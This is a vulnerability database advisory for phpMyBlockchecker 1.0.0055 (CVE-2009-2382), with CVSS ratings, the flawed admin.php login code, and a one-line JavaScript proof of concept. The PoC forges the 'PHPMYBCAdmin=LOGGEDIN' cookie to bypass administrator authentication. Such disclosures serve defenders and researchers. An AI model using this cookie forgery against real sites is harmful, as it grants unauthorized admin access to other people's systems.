Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability
2009.07.11
Credit:
SirGod
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2009-2382
CWE:
CWE-287
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
################################################################################################################ [+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ################################################################################################################# [+] Download Script : http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884 [+] Insecure Cookie Handling - Vulnerable code in admin.php ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- if ($_COOKIE[PHPMYBCAdmin] == '') { if (!$_POST[login] == 'login') { die("Please Login:<BR><form method=post><input type=password name=password><input type=hidden value=login name=login><input type=submit></form>"); } elseif($_POST[password] == $bcadminpass) { setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60); header("Location: admin.php"); } else { die("Incorrect"); } } ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - PoC javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/"; document.cookie = "1246371700; path=/"; #################################################################################################################
Referencje:
http://xforce.iss.net/xforce/xfdb/51445
http://www.milw0rm.com/exploits/9053
http://secunia.com/advisories/35660
http://osvdb.org/55505
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top